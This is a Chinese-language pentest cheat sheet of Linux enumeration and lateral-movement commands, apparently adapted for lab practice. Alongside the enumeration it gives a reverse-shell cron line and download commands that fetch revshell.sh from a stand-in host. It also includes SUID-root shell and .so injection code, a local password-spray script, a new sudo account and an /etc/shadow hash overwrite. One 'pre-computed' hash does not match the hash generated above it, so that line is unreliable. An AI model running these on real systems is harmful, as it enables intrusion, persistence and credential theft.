Linux常用命令-横向移动-h4rithd-2024.04.03版本

笔记说明:

该笔记是国外进攻性爱好者 h4rithd 在 gitbook 上记录的备忘笔记,我整体翻译了注释的内容,并根据个人打靶学习情况,增加或删除了一部分内容,至此放置博客上留作后续复习使用,以及方便各位浏览到我博客的安全爱好者参考使用。

01.常用枚举

大部分命令摘自: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

01.1 操作系统枚举

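## ------------------| OS details
cat /etc/*-release
cat /proc/version
lsb_release -a
hostnamectl

## ------------------| Joined to a domain?
cat /etc/krb5.conf
kinit -k host/$(hostname -f)
realm list | grep active-directory
adcli testjoin

## ------------------| Kernel version
uname -a
uname --kernel-name --kernel-release --machine

## ------------------| sudo version
sudo -V 2>/dev/null | grep "Sudo ver"

## ------------------| System / disk information
(df -h || lsblk) 2>/dev/null

## ------------------| List all services (each alternative is tried until one exists)
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null

## ------------------| Mounted filesystems
(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "/ /|/null | proc proc |/dev/console"

## ------------------| USB Creator D-Bus service present?
busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator

## ------------------| ASLR enabled? (0 = off, 2 = full randomisation)
cat /proc/sys/kernel/randomize_va_space 2>/dev/null

## ------------------| Virtualised environment?
systemd-detect-virt
grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor

## ------------------| Search for socket files
find / -type s 2>/dev/null

## ------------------| Files carrying capabilities
getcap -r / 2>/dev/null

## ------------------| Grant a capability to a file (here: bind to ports below 1024 without root).
## readlink -f resolves the symlink so the bit lands on the real binary; any such grant widens that binary's privilege and should be reviewed.
sudo setcap cap_net_bind_service=+ep $(readlink -f /usr/bin/python3)

## ------------------| Inside an LXC container?
cat /proc/1/environ

## ------------------| Inside a Docker container?
find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null

## ------------------| Enumerate the Docker socket
### The two -name tests are grouped so that "-type s" and the /sys exclusion apply to both;
### without the parentheses -o binds loosely and the second -name matched files of any type.
find / ! -path "/sys/*" -type s \( -name "docker.sock" -o -name "docker.socket" \) 2>/dev/null
### Replace <socket_path> with a path found above. Write access to this socket is equivalent to control of the daemon.
curl -s --unix-socket <socket_path> http://localhost/info

## ------------------| Enumerate Kubernetes
### Kubernetes namespace
cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null
### Kubernetes service-account token (a credential: keep it out of notes and tickets)
cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null
### Kubernetes service-account directory
ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null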

01.2 用户枚举

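## ------------------| Current user's groups
(id || (whoami && groups)) 2>/dev/null

## ------------------| Current user's sudo rights
sudo -l

## ------------------| All users with a login shell
## awk reads the file directly (no cat pipe); the test matches the one used by the spray script further down
awk -F: '$NF ~ /sh$/ {print $1}' /etc/passwd

## ------------------| Superusers (UID 0)
awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null

## ------------------| Users with a shell
grep "sh$" /etc/passwd 2>/dev/null | sort

## ------------------| Login activity
### Currently logged in
(w || who || finger || users) 2>/dev/null
### Last logins
(last -Faiw || last) 2>/dev/null | tail
lastlog 2>/dev/null | grep -v "Never"

## ------------------| Password policy
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null

## ------------------| Change a user's password (--stdin is not available on every distribution; the password ends up in shell history)
echo "h4rithd" | passwd --stdin <user>

## ------------------| Add a new user to the sudo group (-1 = MD5-crypt hash).
## A new sudo-capable account is a persistence artifact: it appears in /etc/passwd, /etc/group and the auth log.
useradd -p $(openssl passwd -1 h4rithd) -m newadmin --groups sudo

## ------------------| Create a group and a user with a given id
sudo groupadd -g 2017 dummy
sudo useradd dummy -u 2017 -g 2017 -s /bin/bash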

01.3 进程枚举

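## ------------------| List all current processes
## BSD-style options take no leading dash; "-aux" is interpreted inconsistently across ps implementations
ps auxw | less -w
(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | grep --color=always -z root

## ------------------| Processes belonging to the current user
ps -ef | grep $(whoami) | less -w

## ------------------| Permissions of the running binaries (awk de-duplicates; entries owned root:root or by $USER are dropped)
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER "

## ------------------| List all cron jobs
grep "CRON" /var/log/cron.log
cat /etc/crontab
ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null

## ------------------| Per-user crontab files
ls -al /var/spool/cron/crontabs/

## ------------------| Shape of a system-crontab entry (minute hour day month weekday user command).
## The example is a reverse shell; a line like this in /etc/crontab or /etc/cron.d is a persistence indicator.
* * * * * root bash -c 'bash -i >& /dev/tcp/<IP>/<Port> 0>&1'

## ------------------| List all systemd timers
watch -n 1 'systemctl list-timers'
systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)"
### Locate the unit file a timer activates (value of the ACTIVATES column)
find /etc | grep <ACTIVATES>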

01.4 网络枚举

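## ------------------| List IP addresses ("addrbash" in the original was a rendering artifact; the subcommand is "addr")
ifconfig
ip -c -a -h addr
grep '|--' /proc/net/fib_trie

## ------------------| ARP table
arp -n
cat /proc/net/arp

## ------------------| Kill whatever holds a local port
fuser -k 4444/tcp

## ------------------| Listening ports / tunnels
netstat -anlp | grep LIST
(netstat -punta || ss -nltpu || netstat -anv) 2>/dev/null | grep -i listen

## ------------------| Which process sits behind a port (PID from the listing above)
ps -ef | grep <PID>

## ------------------| Hostname, hosts file and DNS resolvers
cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null

## ------------------| Routes and neighbours
netstat -rn 2>/dev/null
(route || ip n || cat /proc/net/route) 2>/dev/null
(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null

## ------------------| Private / link-local networks this host is on
ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\."

## ------------------| Read socket addresses from /proc (hex; the IPv4 bytes are stored in reverse order, see the Perl decoder below)
awk '{print $1,$2,$3,$4}' /proc/net/tcp
### 0: 00000000:0016 00000000:0000 0A
### | | | | | |--> connection state
### | | | | |------> remote TCP port number
### | | | |-------------> remote IPv4 address
### | | |--------------------> local TCP port number
### | |---------------------------> local IPv4 address
### |----------------------------------> number of entry

## ------------------| Perl script to decode an address from /proc/net/tcp
### Usage: perl proc.pl 00000000 0016
#!/usr/bin/perl
my $hexip=$ARGV[0];
my $hexport=$ARGV[1];
print "hex: $hexip\n";
my @ip = map hex($_), ( $hexip =~ m/../g );
my $ip = join('.',reverse(@ip));
my $port = hex($hexport);
print "IP: $ip PORT: $port\n";

## ------------------| Capture traffic to a pcap file (-s0 = full packets; the filter expression limits what is captured)
sudo tcpdump -i any -w /tmp/capture.pcap -v
sudo tcpdump -i any -w /tmp/capture.pcap -v -s0
sudo tcpdump -i any -w /tmp/capture.pcap -v icmp
sudo tcpdump -i any -w /tmp/capture.pcap -v port 21
sudo tcpdump -i any -w /tmp/capture.pcap -v not port 22
sudo tcpdump -i any -w /tmp/capture.pcap -v -s0 -nn port 80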
  • egressbuster
## ------------------| Manual egress check
### On the listener side: show incoming SYNs on the VPN interface (tcp[13]==2 selects segments with only the SYN flag set)
sudo tcpdump -i tun0 tcp[13]==2
### On the compromised machine: probe ports 1-1000 towards the listener; the SYNs that arrive reveal which outbound ports the egress filter allows.
### For a defender, a burst of SYNs from one internal host to sequential external ports is the signature of this check.
nc -nzv -w 1 <MyIP> 1-1000

## ------------------| Using the TrustedSec egressbuster script
git clone https://github.com/trustedsec/egressbuster.git && cd egressbuster
### On the listener side
python3 egress_listener.py <your_local_ip> <interface_for_listener> 0.0.0.0/0
### On the compromised machine
python3 egressbuster.py <your_local_ip> 1-65536
  • IP表
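## ------------------| iptables
### Active rules [needs privileges]
iptables -L

### Persisted rule files
ls /etc/iptables/

### IPv4 (the original read "cat ls <file>", which makes cat fail on a non-existent file named "ls")
cat /etc/iptables/rules.v4

### IPv6
cat /etc/iptables/rules.v6

### Open the default policies. Save the current rule set first so it can be put back with iptables-restore.
### Note this only changes the chain policies; existing rules are not flushed. Both "ACCEP" and the mangled file name were typos in the original.
iptables-save > /dev/shm/firewall.rules
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT

### OpenBSD (pf / authpf)
find /etc/authpf
/etc/authpf/authpf.conf
/etc/authpf/authpf.rules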

01.5 文件/目录枚举

  • 常见的
## ------------------| ls with useful sort options
ls -laSrh # sort by size
ls -lacrh # sort by change time
ls -laurh # sort by access time
ls -laRh # recursive ls
ls -latrh # sort by date

## ------------------| Extended file attributes (chattr flags such as immutable)
lsattr <DirectoryName>

## ------------------| File access control lists
getfacl <DirectoryName>

## ------------------| List files with their directories
find . -type f -ls 2>/dev/null

## ------------------| List files including subdirectories
### NOTE(review): -ls comes before -type f, so every entry (directories included) is printed before the type test is evaluated — confirm that is intended
find . -ls -type f 2>/dev/null

## ------------------| All files with their line count
find -type f -exec wc -l {} \; 2>/dev/null | sort -nr

## ------------------| What is in the shell history files?
cat ~/.*history | less

## ------------------| Most recently modified files under $1
### First form runs stat once per file; the second batches through xargs -0 and copes with unusual file names
find $1 -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
find $1 -type f -print0 | xargs -0 stat --format '%Y :%y %n' | sort -nr | cut -d: -f2- | head
  • SUID/SGID
## ------------------| List all SUID binaries (compare against a known-good baseline; unexpected entries are a privilege-escalation surface)
### Plain search
find / -perm -4000 -ls 2>/dev/null
### Sorted by modification time, oldest first
find / -perm -4000 -printf "%T@\t%Tc %6k KiB %p\n" 2>/dev/null | sort -n | cut -f 2-

## ------------------| List all SGID binaries
find / -perm -2000 -ls 2>/dev/null
  • 查找硬编码凭据。
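## Highlight matches white on red (GREP_COLOR is honoured by older GNU grep; recent versions use GREP_COLORS)
export GREP_COLOR='1;37;41'
## Recursive, case-insensitive search for password-like keywords, skipping css/js/md
grep --color=always -RiE '(password|pwd|pass)' . --exclude=\*.{css,js,md} 2>/dev/null
## Only keyword = value assignments
grep --color=always -RiE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' * 2>/dev/null
## The original ended with "–color=always" (en dash), which grep treated as a file name; the option is already given once
grep --color=always -Rnw '/' -ie "PASSWORD\|PASSWD" 2>/dev/null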
  • 查找复杂的
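## ------------------| Files owned by the current user / group
find / -user $(whoami) -ls 2>/dev/null
### $(groups) expands to every group name; with more than one group find receives extra operands — use the loop below instead
find / -group $(groups) -ls 2>/dev/null

## ------------------| If you belong to several groups
for i in $(groups);do find / -group $i -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys';done

## ------------------| Same as above with pseudo-filesystems filtered out
find / -user $(whoami) -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys'
find / -group $(groups) -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys'

## ------------------| Writable directories under /
## The symbolic -perm form is "-o=w"; the original "-perm -o w" is not a valid mode (the file also uses -o=r below)
find / -writable -type d -ls 2>/dev/null
find / -perm -222 -type d -ls 2>/dev/null
find / -perm -o=w -type d -ls 2>/dev/null

## ------------------| World-executable (searchable) directories under /
find / -perm -o=x -type d -ls 2>/dev/null

## ------------------| Files owned by root that are not world-readable
find / -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "/sys\|/boot\|/var\|/etc/\|/run"

## ------------------| All files with permissions and owner, tabulated
find . -type f -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null | column -t

## ------------------| Files modified within the last 10 days
## "-mtime -10" means less than 10 days; the original "-mtime 10" matched only files modified exactly 10 days ago
find / -mtime -10 -ls 2>/dev/null

## ------------------| Files accessed within the last 10 days
find / -atime -10 -ls 2>/dev/null

## ------------------| Files whose metadata changed in the last hour (60 minutes)
find / -cmin -60 -ls 2>/dev/null

## ------------------| Files accessed in the last hour (60 minutes)
find / -amin -60 -ls 2>/dev/null

## ------------------| Binaries placed by hand [interesting]
## Full timestamps are printed; entries with an all-zero nanosecond field (presumably package-installed) and symlinks are dropped
for i in /usr/sbin /usr/bin /sbin /bin; do ls -la --time-style=full $i | grep -v '000000000\|->' ; done

## ------------------| Files modified between two dates
find / -newermt "2021-11-21" ! -newermt "2021-12-21" -ls 2>/dev/null

## ------------------| Files containing the keywords password / username
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
grep --color=auto -rnw '/etc' -ie "PASSWORD" --color=always 2> /dev/null
grep --color=auto -rnw '/etc' -ie "USERNAME" --color=always 2> /dev/null

## ------------------| SSH host key fingerprints (MD5, to compare with a client's known_hosts)
ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_rsa_key.pub
ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_ecdsa_key.pub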
  • 共享对象注入
# Trace file and library lookups of a binary; "no such file" hits are the missing objects the shared-object-injection check is concerned with
strace /path/to/file 2>&1 | grep -iE "open|access|no such file"
  • 列出 noexec 挂载
# Mounts flagged noexec: binaries placed there cannot be executed directly (noexec is a speed bump, not a complete control)
mount | grep noexec
  • PATH环境变量
## ------------------| Checking: which external commands does the binary run, and are they called by relative name?
strings /path/to/file
strace -v -f -e execve /path/to/file 2>&1 | grep exec
ltrace /path/to/file

## ------------------| Stand-in program (C) that replaces the relative-path command; compile it under that command's name.
## The mitigation on the binary's side is to call helpers by absolute path and to reset PATH / drop privileges before system().
int main() {
setuid(0);
system("/bin/bash -p");
}

## ------------------| Execute with the current directory first in PATH
PATH=.:$PATH /path/to/file

## ------------------| If bash < 4.2-048, an exported shell function can shadow an absolute path as well (later bash versions refuse such function names)
strace -v -f -e execve /path/to/file 2>&1
function /path/to/service { /bin/bash -p; }
export -f /path/to/service
/path/to/file
  • 读取审核文件
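## ------------------| Audit reports (readable if you are in the adm group)
aureport
aureport --help
aureport --tty

## Failed logins. grep reads the log files directly; -h suppresses the file-name prefix that several files would otherwise add
grep -h "Failed password" /var/log/auth.*
## Source IPs of all log lines, counted
grep -hoE "([0-9]{1,3}[\.]){3}[0-9]{1,3}" /var/log/auth.* | sort | uniq -c
## Password-related lines that are neither failures nor invalid-user attempts
grep -h "password" /var/log/auth.* | grep -v 'Failed\|Invalid'
## The original had `$(whoami)` inside single quotes with backticks, so the literal text was matched; double quotes expand it to the current user name
grep -hi "root\|user\|usern\|passw\|pass\|$(whoami)" /var/log/auth.* | awk -F: '{print $5}' | sort | uniq -c
grep -hi "root\|user\|$(whoami)\|cron" /var/log/syslog* | awk -F: '{print $5}' | sort | uniq -c
## Count failed-password attempts per source IP, then per target user name, from sshd lines (field positions differ for "invalid user" entries)
awk '{if($6=="Failed"&&$7=="password"){if($9=="invalid"){ips[$13]++;users[$11]++}else{users[$9]++;ips[$11]++}}}END{for(ip in ips){print ip, ips[ip]}}' /var/log/auth.* | sort -k2 -rn
awk '{if($6=="Failed"&&$7=="password"){if($9=="invalid"){ips[$13]++;users[$11]++}else{users[$9]++;ips[$11]++}}}END{for(user in users){print user, users[user]}}' /var/log/auth.* | sort -k2 -rn

## ------------------| Extract username=...&password=... pairs from a log as user:pass
sed -n 's/.*username=\([^&]*\).*password=\([^&]*\).*/\1:\2/p' logfile.txt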
  • 恢复文件
## ------------------| Using foremost (carve deleted files out of a raw device)
sudo apt-get install foremost
mkdir /tmp/recov
sudo foremost -q -v -i /dev/sda1 -t <jpeg,txt,..> -o /tmp/recov

#-v - verbose mode; log every message to the screen
#-q - quick mode; search on 512-byte boundaries
#-t - file types to carve (-t jpeg,pdf,...)
#-d - enable indirect block detection (for UNIX filesystems)
#-i - input file (default: stdin)
#-o - output directory (default: output)
#-Q - quiet mode; suppress output messages

## ------------------| Using lsof [works while a process still holds the deleted inode open]
lsof | grep -i deletedFile.txt
  • 解密 Mozilla Firefox 受保护的密码
# Offline decryption of the saved logins in a Firefox profile directory; read access to the profile is equivalent to access to the stored credentials
git clone https://github.com/lclevy/firepwd.git

python firepwd.py -d /c/Users/..../Profiles/
  • ZipSlip 博览会
# Build an archive containing a symlink that points outside the extraction directory.
# Whether the archive stores the link or the target's contents depends on zip's options; an extractor that follows the link is the Zip Slip class of bug.
ln -s ../../../../../../etc/passwd document.pdf
zip expo.zip document.pdf

01.6 软件/包枚举

## ------------------| List all installed packages
dpkg -l

## ------------------| Search for compilers (dpkg, then yum; then a PATH lookup, then locate)
dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"

## ------------------| MySQL client version
mysql --version 2>/dev/null

01.7 活动目录

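## ------------------| Joined to a domain?
cat /etc/krb5.conf

## ------------------| Search for credentials / tickets
## The glob is quoted so the shell does not expand it against the current directory before find sees it
find / -name '*.keytab' 2>/dev/null

## ------------------| Request a TGT using a keytab
kinit <User>@<Domain> -k -t domain.keytab

## ------------------| Show current tickets
klist

## ------------------| Request a CIFS service ticket for the child domain controller
kvno cifs\/OPS-ChildDC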

01.8 其他

  • 创建带有特殊字符的文件
# "--" ends option parsing so a name starting with "-" is not taken as an option; the quotes keep "|" literal
touch -- 'echo | hello'
  • 通过替换 /etc/shadow 文件中的哈希更改 root 密码
## ------------------| Create a password hash
openssl passwd -6 -salt h4rithd h4rithd123
### -1 --> MD5
### -5 --> SHA256
### -6 --> SHA512
### the -salt flag can be omitted as well

### Hash of h4rithd123 with the salt above, to go into the password field of /etc/shadow
$6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0

### PASSWORD stands for the hash. The expression keeps field 1 (user name) and everything from field 3 on;
### it has no line address, so it rewrites the password field of EVERY account, not just root.
### Editing /etc/shadow in place changes its mtime/ctime — a file-integrity monitor will flag it.
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow

## ------------------| One-liner with the hash of h4rithd123 already inserted (slashes in the hash are escaped for sed)
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow
  • 下载文件。
## ------------------| WGET
## All of the fetch methods below leave the URL in shell history and a new file on disk; proxy/DNS logs show the download.
wget https://10.10.14.25/revshell.sh -O /tmp/revshell.sh

## ------------------| CURL
curl -o /tmp/revshell.sh https://10.10.14.25/revshell.sh

## ------------------| OpenSSL
### Create a self-signed certificate (the client side below does not verify it)
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
### Stand up a TLS server that sends the file to whoever connects
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/revshell.sh
### Download the file
openssl s_client -connect 10.10.14.25:80 -quiet > revshell.sh

## ------------------| Bash (/dev/tcp)
### Open a TCP connection to the web server on file descriptor 3 (bash-only feature)
exec 3<>/dev/tcp/10.10.10.32/80
### Raw HTTP GET request (no Host header is sent)
echo -e "GET /revshell.sh HTTP/1.1\n\n">&3
### Print the response, headers included
cat <&3

## ------------------| PHP
### file_get_contents()
php -r '$file = file_get_contents("https://10.10.14.25/revshell.sh"); file_put_contents("revshell.sh",$file);'
### fopen() with a 1024-byte read buffer
php -r 'const BUFFER = 1024; $fremote = fopen("https://10.10.14.25/revshell.sh", "rb"); $flocal = fopen("revshell.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

## ------------------| Python
### Python 2
import urllib
urllib.urlretrieve ("https://10.10.14.25/revshell.sh", "revshell.sh")
### Python 3
import urllib.request
urllib.request.urlretrieve("https://10.10.14.25/revshell.sh", "revshell.sh")

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("revshell.sh", Net::HTTP.get(URI.parse("https://10.10.14.25/revshell.sh")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://10.10.14.25/revshell.sh", "revshell.sh");'
  • LUKS 安装/卸载Linux统一密钥设置
# ------------------| Mount (luksOpen asks for the passphrase and exposes the decrypted device under /dev/mapper)
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/

# ------------------| Unmount (-l = lazy unmount; luksClose then removes the mapping so the plaintext device disappears)
sudo umount -l /mnt/
sudo cryptsetup luksClose backup
  • 有没有PAM-Wordle
# ------------------| Find the PAM module's shared object
find / 2>/dev/null | grep wordle
# Lists .so files under /usr and /etc with their timestamps, dropping lines that contain "000"
find /{usr,etc} -type f -printf "%T+ %p\n" 2>/dev/null | grep -v '000'| grep so$

# ------------------| Find the words embedded in the module
strings <file>

02.命令和脚本

02.1 命令

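# ------------------| On the Linux machine
### Check whether IP forwarding is enabled
sudo sysctl -a | grep ip_forward
## 1 means forwarding is on; otherwise enable it. The redirection must be privileged too:
## "sudo echo 1 > file" only elevates echo, the unprivileged shell opens the file and fails.
echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
### iptables rules ("-m state" takes its state list after "--state")
sudo iptables -A FORWARD -i tun0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT
sudo iptables -t nat -A POSTROUTING -s <eth0IP>/24 -o tun0 -j MASQUERADE

# ------------------| On the Windows machine ("rout" in the original was a typo)
route add 10.10.10.0 mask 255.255.254.0 <linuxBox_eth0IP>
ping 10.10.10.2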
  • 授予 SUID 至 dash/vi
# Set the setuid bit on a shell. Any of these leaves a root shell available to every local user;
# a setuid bash/dash (or a root-owned copy in /tmp) is a classic persistence artifact that a SUID audit should catch.
sudo chmod u+s /bin/bash
sudo chmod u+s /bin/dash

sudo chmod 4755 $(which dash)

# Same idea on a copy: root-owned, mode 4555
sudo cp /bin/dash /tmp/dash
sudo chmod 4555 /tmp/dash
sudo chown root /tmp/dash

# -p keeps the elevated effective uid instead of dropping it
/tmp/dash -p

# vi is usually a symlink (alternatives); readlink resolves it so the bit lands on the real binary
sudo chmod 4755 $(readlink $(which vi))
  • 通过 SSH 复制文件
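## ------------------| Syntax
scp <source> <destination>
# Use /* to copy everything in a directory

## ------------------| Copy a file from B to A while logged in to B
scp /path/to/file username@a:/path/to/destination

## ------------------| Copy a file from B to A while logged in to A
scp username@b:/path/to/file /path/to/destination

## ------------------| Alternative: sshfs ---------------------
sudo apt-get install sshfs

## ------------------| Create an empty mount point
mkdir /tmp/testdir
### "Link" (mount) the remote directory onto it
sshfs user@server.com:/remote/dir /tmp/testdir
### "Unlink" (unmount). The original pointed fusermount at /home/user/testdir, which is not the directory mounted above
fusermount -u /tmp/testdir
umount mountpoint
diskutil unmount mountpoint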

02.2 端口敲门

## ------------------| Files
ls /etc/init.d/ | grep knock

## ------------------| With the service name found above, locate its configuration
/etc/default/knockd
/etc/knockd.conf

## ------------------| The configuration looks like this. To open port 22 the ports 571, 290 and 911 must be hit in order, within seq_timeout seconds
## (the original comment said 991; the sequence line and the loop below both use 911)
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

## ------------------| Port knocking with nmap (one SYN probe per port, no retries, short host timeout)
for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 10.10.10.43 ; done

02.3 脚本

#!/bin/bash
# Try one password ($1) against every local account that has a login shell, via su.
# Every attempt goes through PAM and is written to the auth log (su / pam_unix failure lines),
# so the script is noisy: those failure lines are what detection rules for local password spraying key on.

spray() {
# Accounts whose shell field ends in "sh"
users=$(awk -F: '{ if ($NF ~ /sh$/) print $1 }' /etc/passwd)
for user in $users; do
# $1 is the candidate password; timeout stops su from hanging on the prompt
echo "$1" |timeout 2 su $user -c whoami 2>/dev/null
# $? is the status of the last pipeline element (su under timeout): 0 means the password was accepted
if [[ $? -eq 0 ]]; then
exit
fi
done
}

spray $1
  • 创建SUID sudo
// gcc -o sroot sroot.c
// Minimal SUID-root shell: once the binary is root-owned with the setuid bit, setuid(0)/setgid(0)
// make the real ids root as well and bash -p keeps them instead of dropping privileges.
int main(void)
{
setuid(0);
setgid(0);
printf("\n-----| by h4rithd.com |-----\n\n");
system("/bin/bash -p");
}

// chown root:root /tmp/sroot; chmod 4755 /tmp/sroot
// or chmod u+s /bin/bash

// SUID = 4xxx filename
// SGID = 2xxx filename
// Both = 6xxx filename

// Poll until a privileged process has applied the chown/chmod:
// for i in {1..100}; do ls -al /tmp/sroot;date ;sleep .2; done
// watch -n 2 -d ls -l .
// Detection: a new setuid-root binary under /tmp is a strong indicator; the SUID search in the enumeration section lists them.
  • 进程监控器
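#!/bin/bash
# Sample the process list once a second and print the commands that appeared (>) or vanished (<)
# since the previous sample. Useful for spotting short-lived cron/timer jobs.

IFS=$'\n' # Loop by line

old_process=$(ps -eo command)

while true; do
new_process=$(ps -eo command)
# The pattern is quoted so the shell cannot glob-expand it; diff marks added lines with > and removed lines with <
diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
sleep 1
old_process=$new_process
done

# nano prcmon.sh
# chmod +x prcmon.sh; ./prcmon.sh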
  • 每隔 5 秒列出文件
# Print the listing with a timestamp every 5 s, 100 times (e.g. to watch for an owner/permission change made by another process)
for i in {1..100}; do ls -al /tmp/sroot;date ;sleep 5; done
  • Ping 扫描
# Parallel ping sweep of 172.19.0.0/24: each ping runs in a background subshell, so replies are printed in arrival order
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done; 
#!/bin/bash
# Sequential ping sweep of $ip.2-255 (one probe, 1 s wait each); prints the hosts that answered

ip=172.20.0

for i in $(seq 2 255);
do
# Output is discarded; only ping's exit status is used
ping -c 1 -W 1 $ip.$i 1>/dev/null 2>&1
if [[ $? -eq 0 ]];
then
echo "[+] $ip.$i - is Alive!"
fi
done
  • 扫描实时端口
# TCP connect scan using bash's /dev/tcp (no timeout: a filtered port blocks until the kernel gives up; the script version below uses timeout)
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null       
#!/bin/bash
# TCP connect scan of every port on $ip using bash's /dev/tcp; each attempt is capped at 0.1 s by timeout.
# A full 1-65535 sweep is slow and very visible in connection logs.

ip=127.0.0.1

for port in $(seq 1 65535);
do
# The trailing && continues onto the next line: the echo only runs when the connect succeeded
timeout .1 bash -c "echo > /dev/tcp/$ip/$port" &&
echo "[+] $ip : $port - is Open!"
done
echo "==========[ Finished ]============"
  • 共享对象外壳 (.so)
#include <stdio.h>
#include <stdlib.h>

// The constructor attribute makes inject() run automatically when the library is loaded, before main()
static void inject() __attribute__((constructor));

void inject() {
// Copies bash, sets the setuid/setgid bits on the copy and runs it with -p so the privileges are kept.
// A setuid copy of bash in /tmp is the artifact a defender should look for after a suspicious library load.
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

## gcc -shared -o libcounter.so -fPIC libcounter.c

02.4 网络服务器

## ------------------| Python (serves the current directory on port 8080)
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby (un.rb httpd: WEBrick serving the current directory)
ruby -run -ehttpd . -p8080

## ------------------| PHP built-in server on all interfaces
php -S 0.0.0.0:8080

## ------------------| Socat
### NOTE(review): socat requires two addresses; as written this line is incomplete and exits with a usage error — confirm the intended second address
socat TCP-LISTEN:8080,reuseaddr,fork

02.5 Sed命令

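## ------------------| Remove newlines (join the whole file; -z is a GNU sed extension)
sed -z 's/\n//g' filename

## ------------------| Insert text as the first line of a file
sed '1 i addthisword' filename

## ------------------| Delete the first character of each line
## The original used "s/^..//", which removes two characters and did not match its description
sed 's/^.//' filename

## ------------------| Delete the last character of each line
sed 's/.$//g' filename

## ------------------| Delete the last line (footer / trailer line)
sed '$d' file

## ------------------| Delete a particular line
sed '2d' file

## ------------------| Delete a range of lines
sed '2,4d' file

## ------------------| Delete every line except the first (header line)
sed '1!d' file

## ------------------| Delete every line except the last (footer line)
sed '$!d' file

## ------------------| Delete every line outside the given range
sed '2,4!d' file

## ------------------| Delete the first and the last line
sed '1d;$d' file

## ------------------| Delete empty (blank) lines
sed '/^$/d' file

## ------------------| Delete lines that begin with a given character
sed '/^u/d' file

## ------------------| Delete lines that end with a given character
sed '/x$/d' file

## ------------------| Delete lines that contain a pattern
sed '/debian/d' file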
